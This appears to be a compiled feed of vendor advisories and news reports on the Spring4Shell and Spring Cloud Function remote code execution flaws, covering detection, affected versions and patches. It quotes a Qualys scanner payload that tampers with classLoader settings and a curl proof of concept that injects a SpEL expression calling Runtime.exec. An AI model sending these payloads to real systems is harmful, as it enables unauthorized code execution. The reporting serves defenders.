spring-webmvc-*.jar \u2018, \u2018 spring-webflux*.jar \u2018 or \u2018 spring-boot.*jar \u2018 present on the system. \n\nOn Windows system, detection checks vulnerable instances of Spring via WMI to check spring-webmvc, spring-webflux and spring-boot are included in the running processes via command-line with JDK9 or higher. \n\nContainer Sensor image scanning uses find command to check for spring-webmvc, spring-webflux and spring-boot jars from .war files along with JDK9 or higher. \n\n#### Under what situations would QID 376506 not detect the vulnerability? \n\nQID 376506 might not be detected if access to /proc/*/fd is restricted or if the spring-core or spring-beans file is embedded inside other binaries, such as jar, war, etc. 
\n\nFurthermore, this QID might not be detected if the locate command is not available on the target. Targets on Java versions less than 9 are not vulnerable. \n\n#### What is the detection logic for QID 730416 (unauthenticated check)? \n\nQID 730416 is a remote unauthenticated check. It sends a specially crafted HTTP GET request to the remote web application and tries to get a callback on the scanner using the payload: \n \n \n \"?class.module.classLoader.resources.context.configFile=http://<Scanner_IP>:<Random_port>&class.module.classLoader.resources.context.configFile\" \n\nQID 730416 is an intrusive check. The payload used in the detection may in some cases change the Spring configuration on the target application, which can hamper the application's logging capabilities. \n\n#### Under what conditions would QID 730416 not work? \n\nQID 730416 will not work if the following conditions are present: \n\n * "Do not exclude Intrusive checks" is not enabled in Scan Option Profile \n * This QID only checks for the vulnerability at root URI. If the vulnerability lies in non-root URIs, the QID would not be detected. \n * If communication from host to scanner is blocked. \n * The payload gets blocked by a firewall, IPS, etc. that is between the host and the scanner. \n\n### Updates\n\n**Update \u2013 April 7** \n\nA new QID (730416) was added to address CVE-2022-22963 under \u201cQID Coverage\u201d. \n\n**Update \u2013 April 6** \n\nSeveral new QIDs to address CVE-2022-22963 are now available under \u201cQID Coverage\u201d. The CSAM section has been expanded. \n\n**Update \u2013 April 5** \n\nGuidance added for detection using Qualys CSAM, VMDR and XDR, and tracking remediation progress using Unified Dashboards and Patch Management. 
\n\n**Update \u2013 April 4** \n\nQualys has added a [scan utility](<https://github.com/Qualys/spring4scanwin>) for Windows and [scan utility](<https://github.com/Qualys/spring4scanlinux>) for Linux to scan the entire hard drive(s), including archives (and nested JARs), for files that indicate the Java application contains a vulnerable Spring Framework or Spring Cloud library. \n\n**Update \u2013 April 1** \n\nNew QIDs to address CVE-2022-22963 are now available. See the \u201cQID Coverage\u201d section. \n\n**Update \u2013 March 31** \n\nCVE-2022-22965 is now assigned to this vulnerability. Qualys Research Team has released QIDs as of March 30 and will keep updating those QIDs as new information is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T09:00:00", "type": "qualysblog", "title": "Spring Framework Zero-Day Remote Code Execution (Spring4Shell) Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T09:00:00", "id": "QUALYSBLOG:6DE7FC733B2FD13EE70756266FF191D0", "href": 
"https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fortinet": [{"lastseen": "2022-04-28T11:28:54", "description": "Two distinct Spring project vulnerabilities were released recently with critical CVSS scores and classified as zero-day attacks. \nThe two vulnerabilities are currently known as: \nCVE-2022-22965 or Spring4Shell: \nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. \nhttps://tanzu.vmware.com/security/cve-2022-22965 \n[https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1](<https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html?fbclid=IwAR2fXxKQjG9vnJiOaXyZ1N_Ypx91TOzO6f48qGZRfKRzinYtD5nUCIptIjg&m=1>) \nCVE-2022-22963: \nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing \nfunctionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that \nmay result in access to local resources. 
\n<https://tanzu.vmware.com/security/cve-2022-22963>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "fortinet", "title": "CVE-2022-22965 and CVE-2022-22963 vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "FG-IR-22-072", "href": "https://www.fortiguard.com/psirt/FG-IR-22-072", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "paloalto": [{"lastseen": "2022-04-25T23:29:53", "description": "The Palo Alto Networks Product Security Assurance team has completed its evaluation of the Spring Cloud Function vulnerability CVE-2022-22963 and Spring Core vulnerability CVE-2022-22965 for all products and services. 
All Palo Alto Networks cloud services with possible impact have been mitigated and remediated.\n\nThe following products and services are not impacted by these Spring vulnerabilities: AutoFocus, Bridgecrew, Cortex Data Lake, Cortex XDR agent, Cortex Xpanse, Cortex XSOAR, Enterprise Data Loss Prevention, Exact Data Matching (EDM) CLI, Expanse, Expedition Migration Tool, GlobalProtect app, IoT Security, Okyo Garde, Palo Alto Networks App for Splunk, PAN-OS hardware and virtual firewalls and Panorama appliances, Prisma Cloud, Prisma Cloud Compute, Prisma SD-WAN (CloudGenix), Prisma SD-WAN ION, SaaS Security, User-ID Agent, WildFire Appliance (WF-500), and WildFire Cloud.\n\n**Work around:**\nNo workarounds or mitigations are required for Palo Alto Networks products at this time.\n\nCustomers with a Threat Prevention subscription can block the attack traffic related to these vulnerabilities by enabling Threat IDs 92393, 92394, and 83239 for CVE-2022-22965 and Threat ID 92389 for CVE-2022-22963.\n\nSee https://unit42.paloaltonetworks.com/cve-2022-22965-springshell/ for more details on Palo Alto Networks product capabilities to protect against attacks that exploit this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T02:30:00", "type": "paloalto", "title": "Informational: Impact of Spring Vulnerabilities CVE-2022-22963 and CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T02:30:00", "id": "PA-CVE-2022-22963", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2022-22963", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgcabrqTD1UQL7HzljPrvwqXCYkv1djclox3AcQ8Na_vxMGVKwdIvy2QcZ94T6oEON-yCPdjn3NS1gjIhnvO0vhWztDQGuRG-vGMFK-4gF5h-JCwb15c_pE1mTCO9ZQFElckaP6p-wzLgC28Pp1MWGFMwW6ZXK8kjJu7rkmX4n7CbstCx-sROAhbl6t/s728-e100/java-spring-framework.jpg>)\n\nA zero-day remote code execution (RCE) vulnerability has come to light in the Spring framework shortly after a Chinese security researcher [briefly leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) a [proof-of-concept](<https://github.com/tweedge/springcore-0day-en>) (PoC) [exploit](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) on GitHub before deleting their account.\n\nAccording to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit ([JDK](<https://en.wikipedia.org/wiki/Java_Development_Kit>)) versions 9 and later and is a bypass for another vulnerability tracked as [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), enabling an unauthenticated attacker to execute arbitrary code on the target system.\n\nSpring is a [software framework](<https://en.wikipedia.org/wiki/Spring_Framework>) for building Java applications, including web apps on top of the Java EE (Enterprise Edition) platform.\n\n\"In certain configurations, exploitation of 
this issue is straightforward, as it only requires an attacker to send a crafted HTTP request to a vulnerable system,\" researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>). \"However, exploitation of different configurations will require the attacker to do additional research to find payloads that will be effective.\"\n\nAdditional details of the flaw, dubbed \"**SpringShell**\" and \"**Spring4Shell**,\" have been withheld to prevent exploitation attempts and until a fix is in place by the framework's maintainers, Spring.io, a subsidiary of VMware. It's also yet to be assigned a Common Vulnerabilities and Exposures (CVE) identifier.\n\nIt's worth noting that the flaw targeted by the zero-day exploit is different from two previous vulnerabilities disclosed in the application framework this week, including the Spring Framework expression DoS vulnerability ([CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>)) and the Spring Cloud expression resource access vulnerability ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhravc9h6Jt8CniALz9rmUeOODWW7XOdJIlvXQbqQkpHJj5wBhPstmROb2bwynD_ugHL4A6E-wxt6DP6LTLoHFp7_ksvQ3j_SdaY4Y7l_XNW3trRxMFhWTLGm3Kju7DTSYzgG4TFLWcIcBi1hChVTWwYbalxyEWYe57BJjxvvGeqT46gjU6bHM1jJYd/s728-e100/whoami.jpg>)\n\nIn the interim, Praetorian researchers are recommending \"creating a ControllerAdvice component (which is a Spring component shared across Controllers) and adding dangerous patterns to the denylist.\"\n\nInitial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe. 
\"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous,\" Flashpoint [said](<https://www.flashpoint-intel.com/blog/what-is-springshell-what-we-know-about-the-springshell-vulnerability/>) in an independent analysis.\n\nDespite the public availability of PoC exploits, \"it's currently unclear which real-world applications use the vulnerable functionality,\" Rapid7 [explained](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). \"Configuration and JRE version may also be significant factors in exploitability and the likelihood of widespread exploitation.\"\n\nThe Retail and Hospitality Information Sharing and Analysis Center (ISAC) also [issued a statement](<https://www.rhisac.org/press-release/spring-framework-rce-vulnerability/>) that it has investigated and confirmed the \"validity\" of the PoC for the RCE flaw, adding it's \"continuing tests to confirm the validity of the PoC.\"\n\n\"The Spring4Shell exploit in the wild appears to work against the stock 'Handling Form Submission' sample code from spring.io,\" CERT/CC vulnerability analyst Will Dormann [said](<https://twitter.com/wdormann/status/1509372145394200579>) in a tweet. \"If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T05:52:00", "type": "thn", "title": "Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22950", "CVE-2022-22963"], "modified": "2022-03-31T15:27:03", "id": "THN:51196AEF32803B9BBB839D4CADBF5B38", "href": "https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2022-04-07T11:27:17", "description": "Spring by VMWare has released Spring Cloud Function versions 3.1.7 and 3.2.3 to address remote code execution (RCE) vulnerability CVE-2022-22963 as well as Spring Framework versions 5.3.18 and 5.2.20 to address RCE vulnerability CVE-2022-22965, known as \u201cSpring4Shell.\u201d A remote attacker could 
exploit these vulnerabilities to take control of an affected system.\n\nAccording to VMware, the Spring4Shell vulnerability bypasses the patch for [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), causing CVE-2010-1622 to become exploitable again. The bypass of the patch can occur because Java Development Kit (JDK) versions 9 and later provide two sandbox restriction methods, providing a path to exploit CVE-2010-1622 (JDK versions before 9 only provide one sandbox restriction method).\n\nCISA encourages users and administrators to immediately apply the necessary updates in the Spring Blog posts that provide the [Spring Cloud Function updates addressing CVE-2022-22963](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) and the [Spring Framework updates addressing CVE-2022-22965](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). CISA also recommends reviewing VMWare Tanzu Vulnerability Report [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](<https://tanzu.vmware.com/security/cve-2022-22965>) and CERT Coordination Center (CERT/CC) Vulnerability Note [VU #970766](<https://www.kb.cert.org/vuls/id/970766>) for more information. 
\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T00:00:00", "type": "cisa", "title": "Spring Releases Security Updates Addressing \"Spring4Shell\" and Spring Cloud Function Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:00:00", "id": "CISA:6CCB59AFE6C3747D79017EDD3CC21673", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/04/01/spring-releases-security-updates-addressing-spring4shell-and", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-04-11T19:29:49", "description": " * Spring Framework RCE (Spring4Shell): 
[CVE-2022-22965](<https://www.cve.org/CVERecord?id=CVE-2022-22965>)\n\nA Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n * Spring Framework DoS: [CVE-2022-22950](<https://www.cve.org/CVERecord?id=CVE-2022-22950>)\n\nIn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.\n\n * Spring Cloud RCE: [CVE-2022-22963](<https://www.cve.org/CVERecord?id=CVE-2022-22963>)\n\nIn Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.\n\nImpact\n\nThere is no impact; F5 products and services and NGINX products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:47:00", "type": "f5", "title": "Spring Framework (Spring4Shell) and Spring Cloud vulnerabilities CVE-2022-22965, CVE-2022-22950, and CVE-2022-22963", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-11T17:28:00", "id": "F5:K11510688", "href": "https://support.f5.com/csp/article/K11510688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-03-31T16:29:53", "description": "_NOTE: This post is about the confirmed and patched vulnerability tracked as [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>). While the researchers at Sysdig refer to this Spring Cloud bug as \u201cSpring4Shell,\u201d it should be noted that there is some confusion as to what to call it, with another security firm referring to a different, unconfirmed bug in Spring Core as \u201cSpring4Shell.\u201d To avoid confusion, this post has been amended to take out references to Spring4Shell altogether._\n\nA concerning security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.\n\nSome researchers have noted that because of its ease of exploit and Java-based nature, it\u2019s reminiscent of the [Log4Shell vulnerability](<https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/>) discovered in December.\n\n\u201c[This] is another in a series of major Java vulnerabilities,\u201d Stefano Chierici, a security researcher at Sysdig, noted in materials shared with Threatpost. \u201cIt has a very low bar for exploitation so we should expect to see attackers heavily scanning the internet. 
Once found, they will likely install cryptominers, [distributed denial-of-service] DDoS agents, or their remote-access toolkits.\u201d\n\nThe bug ([CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>)) affects versions 3.1.6 and 3.2.2, as well as older, unsupported versions, according to a [Tuesday advisory](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) from VMware. Users should update to [3.1.7](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.1.7/>) and [3.2.3](<https://repo.maven.apache.org/maven2/org/springframework/cloud/spring-cloud-function-context/3.2.3/>) in order to implement a patch.\n\n## Why Such a Low CVSS Score?\n\nWhile it carries a medium-severity score of 5.4 on the CVSS scale, researchers warned not to underestimate the bug\u2019s impact.\n\n\u201cVMware is using the CVSSv3 base metric \u2018CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L.\u2019 This is underrepresenting the confidentiality, integrity and availability impacts of this vulnerability,\u201d Sysdig researchers Nick Lang and Jason Avery told Threatpost. \u201cThis vulnerability allows an attacker to open a reverse shell in the context of the Spring Cloud service, which may be as root. 
The impacts are all high and do not require user interaction, which gives this CVE a critical rating.\u201d\n\nThey added, \u201cIn our testing, we verified that user interaction is not required to leverage the CVE-2022-22963 vulnerability to gain unauthorized access.\u201d\n\nSatnam Narang, staff research engineer, Tenable, agrees with the assessment that the CVSS score may not be reflective of the true impact of the issue.\n\n\u201cBecause the vulnerability is considered a remote code execution flaw that can be exploited by an unauthenticated attacker, it appears that the CVSSv3 score might not reflect the actual impact of this flaw,\u201d he said via email.\n\nPaul Ducklin, principal research scientist at Sophos, noted that it alarmingly allows for \u201cinstant RCE.\u201d\n\n\u201cMy recommendation is simple, and doesn\u2019t need a score: Patch against CVE-2022-22963 because it\u2019s attracting lots of interest, and proof-of-concept code is readily available, so why be behind when you could so easily be ahead?\u201d he told Threatpost.\n\n## **Widescale Consequences Set to Sprout**\n\nSpring Cloud is an open-source microservices framework: A collection of ready-to-use components which are useful in building distributed applications in an enterprise. It\u2019s [widely used across industries](<https://spring.io/projects/spring-cloud>) by various companies and includes ready-made integration with components from various app providers, including Kubernetes and Netflix.\n\nAs such, its footprint is concerning, according to Sysdig.\n\n\u201cSpring is\u2026used by millions of developers using Spring Framework to create high-performing, easily testable code,\u201d Chierici said. \u201cThe Spring Cloud Function framework allows developers to write cloud-agnostic functions using Spring features. 
These functions can be stand-alone classes and one can easily deploy them on any cloud platform to build a serverless framework.\u201d\n\nHe added, \u201cSince Spring Cloud Function can be used in Cloud serverless functions like AWS lambda or Google Cloud Functions, those functions might be impacted as well\u2026leading the attackers inside your cloud account.\u201d\n\n## **The CVE-2022-22963 Bug in Bloom**\n\nAccording to Sysdig, the vulnerability can be exploited over HTTP: Just like Log4Shell, it only requires an attacker to send a malicious string to a Java app\u2019s HTTP service.\n\n\u201cUsing routing functionality, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) as a routing-expression to access local resources and execute commands in the host,\u201d Chierici explained. \u201cThe issue with CVE-2022-22963 is that it permits using HTTP request header spring.cloud.function.routing-expression parameter and SpEL expression to be injected and executed through StandardEvaluationContext.\u201d\n\nAs such, unfortunately, an exploit is \u201cquite easy to accomplish\u201d using a simple curl command he noted:\n\n_curl -i -s -k -X $\u2019POST\u2019 -H $\u2019Host: 192.168.1.2:8080\u2032 -H $\u2019spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\\\u201dtouch /tmp/test\u201d)\u2019 \u2013data-binary $\u2019exploit_poc\u2019 $\u2019http://192.168.1.2:8080/functionRouter\u2019_\n\n_<CURL>_\n\nSysdig published a PoC exploit on its GitHub page, and as noted, others are circulating.\n\n\u201cThe PoCs we\u2019ve seen so far have all simply popped up a calculator app, that being more than enough to prove the point, but it looks as though any command already installed on the server could easily be launched,\u201d [noted Ducklin](<https://nakedsecurity.sophos.com/2022/03/30/vmware-spring-cloud-java-bug-gives-instant-remote-code-execution-update-now/>), who refers to the bug as the \u201cSpring Expression 
Resource Access Vulnerability\u201d or \u201cSPEL Vulnerability.\u201d\n\nHe added, \u201cThis includes remotely triggering web downloader programs such as curl, launching command shells such as bash, or indeed doing both of those in sequence as a way of quietly and quickly implanting malware.\u201d\n\n## **Weeding Out Compromises**\n\nAfter applying the patch, anyone using applications built using Spring Cloud should take a careful inventory of their installations to make sure compromise hasn\u2019t already occurred, according to Sysdig.\n\n\u201cEven though you might have already upgraded your library or applied one of the other mitigations on containers affected by the vulnerability, you need to detect any exploitation attempts and post-breach activities in your environment,\u201d Chierici said.\n\nThat detection can be done via image scanners or a runtime detection engine to suss out malicious behaviors in already-deployed hosts or pods, he noted.\n\n\u201cThe best defense for this type of vulnerability is to patch as soon as possible,\u201d according to Sysdig\u2019s writeup. \u201cHaving a clear understanding of the packages being used in your environment is a must in today\u2019s world.\u201d\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T18:04:11", "type": "threatpost", "title": "RCE Bug in Spring Cloud Could Be the Next Log4Shell, Researchers Warn", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22693", "CVE-2022-22963"], "modified": "2022-03-30T18:04:11", "id": "THREATPOST:D7D5E283A1FBB50F8BD8797B0D60A622", "href": "https://threatpost.com/critical-rce-bug-spring-log4shell/179173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2022-05-19T17:43:45", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated 
attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring Framework](<https://spring.io/>) is a Java framework that can be used to create applications such as web applications. Due to improper handling of PropertyDescriptor objects used with data binding, Java applications written with Spring may allow for the execution of arbitrary code.\n\nExploit code that targets affected WAR-packaged Java code for tomcat servers is publicly available.\n\nNCSC-NL has a [list of products and their statuses](<https://github.com/NCSC-NL/spring4shell/blob/main/software/README.md>) with respect to this vulnerability.\n\n### Impact\n\nBy providing crafted data to a Spring Java application, such as a web application, an attacker may be able to execute arbitrary code with the privileges of the affected application. Depending on the application, exploitation may be possible by a remote attacker without requiring authentication.\n\n### Solution\n\n#### Apply an update\n\nThis issue is addressed in Spring Framework 5.3.18 and 5.2.20. 
